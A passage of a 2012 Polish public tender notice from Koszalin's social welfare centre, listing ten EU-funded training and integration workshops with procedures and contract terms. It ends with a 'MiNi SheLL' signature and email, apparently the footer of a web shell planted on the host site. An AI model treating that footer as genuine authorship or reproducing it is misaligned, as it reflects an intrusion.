<p>Oświadczenie o Wpisie do Rejestru Instytucji Szkoleniowych - załącznik nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną w formie pisemnej, pod rygorem nieważności, i na zasadach, o których mowa w art. 144 ust.1 ustawy - Prawo zamówień publicznych z dnia 29.01.2004r. (t.j. Dz. U. z 2010 r. Nr 113, poz. 759  z późn. zm.)
Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
A. Zmiany rzutujące na termin realizacji:
- za zgodą Zamawiającego termin realizacji może ulec wydłużeniu (przedłużająca się procedura przetargowa, kataklizmy i siła wyższa, strajki itp., jeżeli mają wpływ na wykonanie przedmiotu zamówienia),
-Zamawiający dopuszcza możliwość zmiany terminów z Wykonawcą Wykonawcami Zadań: 1, 2, 9, 10 z powodu ewentualnych opóźnień w rozstrzygnięciu postępowania w formie aneksu.
Zmiany rzutujące na wynagrodzenie:
- dopuszcza się możliwość zmniejszenia liczby osób skierowanych do udziału w Zadaniach w przypadku braku zapotrzebowania ze strony uczestników projektu: 
dla Zadania 1 - nie więcej, niż o 4 osoby, 
dla Zadania 2 - nie więcej, niż o 7 osób, 
dla Zadania 3 - nie więcej, niż o 1 osobę, 
dla Zadania 4 - nie więcej, niż o 3 osoby, 
dla Zadania 5 - nie więcej, niż o 2 osoby, 
dla Zadania 6 - nie więcej, niż o 2 osoby, 
dla Zadania 7 - nie więcej, niż o 1 osobę, 
dla Zadania 8 - nie więcej, niż o 1 osobę, 
dla Zadania 9 - nie więcej, niż o 1 osobę, 
dla Zadania 10 - nie więcej, niż o 36 godzin. 
W powyższych przypadkach wynagrodzenie Wykonawcy za realizację Zadania ulegnie proporcjonalnemu zmniejszeniu, stosownie do liczby osób skierowanych i lub godzin świadczenia usług.
Zmiana osób wykonujących zamówienie: 
- zmiana osoby osób, która które będzie będą uczestniczyła uczestniczyły w realizacji przedmiotu zamówienia może być dokonana przez Wykonawcę na podstawie pisemnego powiadomienia Zamawiającego na min. 3 dni przed realizacją Zadania lub w szczególnych przypadkach w dniu realizacji Zadania. Przedmiotowa zmiana może być dokonana pod warunkiem, że zostaną spełnione wymagania określone w pkt. 9 ppkt. 2 lit. C) SIWZ, a Zamawiający wyrazi na nią zgodę. Zmiana osoby w tym trybie nie stanowi zmiany osoby i nie wymaga aneksu,
- niezależnie od powodów wskazanych w tiret pierwszym strony mogą odstąpić od umowy na zasadach ogólnych przewidzianych w Kodeksie Cywilnym i Ustawie Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP: mops.koszalin.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia do pobrania w siedzibie Miejskiego Ośrodka Pomocy Społecznej w Koszalinie przy Al. Monte Cassino 2 pok. 07..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej
Al. Monte Cassino 2
75-412 Koszalin
Pokój nr 20 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Koszaliński Program Integracji Społecznej - START, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Czas na zmianę - warsztaty wizażu i stylizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas na zmianę - warsztaty wizażu i stylizacji - 42 osoby (uczestnicy z grupy I - 12 osób; grupy II - 30 osób). Zajęcia prowadzone będą w trzech podgrupach liczących maks. do 15 osób:
- 54 godz., tj. 3 dni x 6 godz. dla każdej podgrupy z przerwą obiadową + serwis kawowy;
- w warsztatach udział weźmie fotograf, który wykona dla uczestników zdjęcia (przed warsztatami 
i po warsztatach). Zdjęcia te uczestnicy warsztatów wykorzystają w swoim CV.
 
Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek pracy 
i aktywizację zawodową uczestników.

Tematyka:
- analiza kolorystyczna - indywidualny dobór kolorów, fryzury;
- zasady doboru garderoby. Nabycie umiejętności skutecznego tuszowania mankamentów urody i podkreślenia atutów. Dobór garderoby do miejsca pracy lub poszukiwanego zatrudnienia;
- zasady łączenia kolorów i dobierania dodatków do garderoby;
- psychologia koloru;
- dobór stroju, makijażu i fryzury na różne okazje, ze szczególnym uwzględnieniem pełnienia ról zawodowych i rodzicielskich;
- techniki makijażu. Dobór kosmetyków;
- analiza kształtu twarzy. Wykonanie makijażu. Dokumentacja fotograficzna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cykl zajęć Spotkanie z ekonomią społeczną w teorii i w praktyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cykl zajęć Spotkanie z ekonomią społeczną w teorii i w praktyce - 72 osoby (uczestnicy z grupy I - 22 osoby, grupy II - 30 osób, grupy III - 20 osób) - III spotkania (w tym ostatnie spotkanie wyjazdowe).

Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek pracy 
i aktywizację zawodową uczestników.

- Spotkanie I o charakterze informacyjnym, prowadzone w formie wykładu - 1 dzień x 8 godz. 
z przerwą obiadową + serwis kawowy. Liczba uczestników: 72 osoby.

Tematyka:
- czym jest ekonomia społeczna? Definicja, cele, obszary działań, rodzaje podmiotów;
- animacja społeczna. Działania na rzecz rozwoju społeczności lokalnej - dobre praktyki;
- zakładanie podmiotów ekonomii społecznej - po co?, na co?, dlaczego?;
- prawne i formalne aspekty działalności gospodarczej w ramach ekonomii społecznej.

- Spotkanie II o charakterze warsztatowym - 6 godz. x 3 podgrupy liczące maks. do 25 osób, tj. 18 godz. z przerwą obiadową + serwis kawowy. Pracę w podgrupach poprowadzą moderatorzy. Liczba uczestników: 72 osoby.

Tematyka:
- wypracowanie przykładowych podmiotów ekonomii społecznej dla miasta Koszalina, analiza zasobów.

- Spotkanie III o charakterze wyjazdowym - jednodniowa wizyta w 2 podmiotach ekonomii społecznej na terenie województwa zachodniopomorskiego (Centra Integracji Społecznej, spółdzielnie socjalne lub inne formy przedsiębiorczości społecznej) - czas trwania wyjazdu: maks. 10 godz. zegarowych z przejazdem. Dojazd autokarem, 1 gorący posiłek, napoje, poczęstunek, koszty wstępu, ewentualne występy artystyczne. Liczba uczestników: 72 osoby.

Tematyka:
- obserwacja różnych form aktywności uczestników w podmiotach ekonomii społecznej - min. 4 godz. tj. min. po 2 godz. zajęć w każdym podmiocie ekonomii społecznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaty informatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty informatyczne - 14 osób (uczestnicy grupy II):
- 16 godz., tj. 4 dni x 4 godz. 

Cel: nabycie umiejętności korzystania z nowych technologii komunikacyjno-informacyjnych (obsługa komputera, urządzeń biurowych, korzystanie z Internetu).

Tematyka: 
- podstawy obsługi komputera (włączanie i wyłączanie komputera, posługiwanie się klawiaturą, myszką i drukarką) - 4 godz.;
- podstawy korzystania z Internetu - 4 godz.;
- praca z edytorem tekstu Microsoft Word - 4 godz.;
- obsługa urządzeń biurowych (faks, kserokopiarka) - 4 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs pierwszej pomocy przedmedycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs pierwszej pomocy przedmedycznej - 25 osób (uczestnicy grupy II). Zajęcia prowadzone będą w dwóch podgrupach liczących maks. do 13 osób:
- 8 godz., tj. 2 dni x 4 godz.

Cel: nabycie elementarnej wiedzy oraz umiejętności prawidłowego postępowania 
i zachowania się podczas sytuacji zagrażającej bezpieczeństwu i życiu, nauczenie się właściwej 
i sprawnej reakcji w stanach zagrożenia życia oraz umiejętności opanowania uczucia strachu podczas udzielania pierwszej pomocy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warsztaty rękodzieła artystycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty rękodzieła artystycznego - 15 osób (uczestnicy grupy I):
- 50 godz., tj. 10 dni x 5 godz.

Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego uczestników i powinny pełnić funkcję terapii zajęciowej - usprawniać uczestników fizycznie i psychicznie.

Tematyka:
- zapoznanie uczestników z różnymi dziedzinami rękodzieła artystycznego: filc, decoupage, rzeźba, ceramika, biżuteria, florystyka, scrapbooking, haft i koronka;
- zajęcia praktyczne w podgrupach zajmujących się daną dziedziną rękodzieła;
- wykonanie ozdób bożonarodzeniowych i prezentów świątecznych dla najbliższych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warsztaty kulinarne Kuchnia za grosik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty kulinarne Kuchnia za grosik - uczestnicy grupy II - 18 osób:
- 20 godz., tj. 4 dni x 5 godz. 

Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego uczestników. Zajęcia teoretyczne 
i praktyczne mają przygotować uczestników do świadomego podejścia do spraw związanych 
z żywieniem i nauczyć przyrządzania posiłków uwzględniając ograniczony budżet oraz zasady zdrowego żywienia, jako istotny element profilaktyki zdrowotnej.

Tematyka: 
- podstawowe zasady przygotowywania posiłków. Stanowisko pracy. Formy przetwarzania żywności;
- racjonalne żywienie. Składniki odżywcze i ich wpływ na zdrowie człowieka. Co warto jeść, czego należy unikać?;
- ekonomia w lodówce- jak kupować i nie marnować;
- zajęcia praktyczne połączone z degustacją. Nauka przygotowania następujących potraw:
zupy, dania obiadowe, desery, śniadania/kolacje;
- przygotowanie uroczystości okolicznościowych (imprezy rodzinne, święta, urodziny, imieniny);
- dekorowanie stołów i potraw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Warsztaty Racjonalne gospodarowanie budżetem domowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty Racjonalne gospodarowanie budżetem domowym -  uczestnicy grupy I - 14 osób. Zajęcia wyjazdowe prowadzone będą w jednej podgrupie:
- 3 dni - 2 noclegi (piątek - niedziela), tj. 16 godz., (1 dzień - 4 godz., 2  dzień - 8 godz., 3 dzień - 4 godz.).

Cel: nabycie wiedzy z zakresu umiejętnego racjonalnego gospodarowania budżetem domowym, nabycie umiejętności opracowania budżetu domowego oraz nauka oszczędzania. 

Tematyka:
- Podstawy finansów domowych i cele finansowe (podstawowe zagadnienia ekonomiczne, definiowanie posiadanych zasobów, źródła dochodów i obszary wydatków);
- Jak stworzyć budżet? (stawianie celów, planowe i celowe zarządzanie budżetem, kontrola przepływów i zmienność w czasie);
- Oszczędzanie bez wyrzeczeń (definiowanie źródeł niekontrolowanych wypływów, klasyfikacja 
i funkcje wydatków, negocjacje w codziennych sprawach i zakupach);
- Planowanie i kontrolowanie wydatków (przykładowy budżet domowy, indywidualne budżety domowe, techniki zarządzania nimi, zakupy codziennie i okazyjne);
- Zasady zarządzania finansami w budżecie domowym (przykładowy budżet domowy, indywidualne budżety domowe, techniki zarządzania, omówienie przykładowych budżetów, sugerowane zmiany, asertywność w kontaktach, czego nie wiedzą ludzie mający problemy finansowe - czyli jak sobie radzić w sytuacjach kryzysowych?)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Moje mieszkanie na szóstkę. Warsztaty z zakresu dbałości o mieszkanie i otoczenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Moje mieszkanie na szóstkę. Warsztaty z zakresu dbałości o mieszkanie i otoczenie - uczestnicy grupy II - 12 osób:
- 20 godz., tj. 4 dni x 5 godz.

Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego uczestników. Zajęcia teoretyczne 
i praktyczne mają przygotować uczestników do świadomego podejścia do spraw związanych 
z dbaniem o porządek oraz wypracowanie umiejętności racjonalnego sprzątania tak, aby czynność ta była przyjemnością a nie przykrym obowiązkiem.

Tematyka:
- problematyka utrzymania czystości;
- środki chemiczne, ich rodzaje i zastosowanie;
- nauka i doskonalenie prania i prasowania;
- nakrywanie stołu;
- mycie podłóg;
- sprzątanie sanitariatów;
- mycie powierzchni szklanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warsztaty motywacyjne i doskonalące umiejętności komunikacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyjazdowe warsztaty motywacyjne i doskonalące umiejętności komunikacyjne - 9 osób (uczestnicy grupy I):
- 3 dni - 2 noclegi (piątek - niedziela), tj. 12 godz. (1 dzień - 3 godz., 2 dzień - 6 godz., 3 dzień - 3 godz.)

Cel:  integracja uczestników, zebranie informacji zwrotnych na temat własnego zachowania, wzmocnienie motywacji do działania, poznanie zachowań innych osób i funkcjonowania w grupie oraz nauka prawidłowej komunikacji.

Tematyka:
- zwiększenie umiejętności funkcjonowania w obszarze społeczno - zawodowym;
- techniki i sposoby zmniejszania społecznego lęku;
- techniki i sposoby rozwiązywania problemów interpersonalnych;
- kształtowanie odpowiedzialnej i aktywnej postawy życiowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Usługa wsparcia i aktywizacji rodzin marginalizowanych - wsparcie konsultanta rodzinnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa wsparcia i aktywizacji rodzin marginalizowanych - wsparcie konsultanta rodzinnego - dla 6 osób (oraz ich rodzin) x 20 godz. miesięcznie  = 120 godz. miesięcznie przez okres 3 m-cy = 360 godz.;
- usługę świadczyć będzie 2 konsultantów w miejscu zamieszkania uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com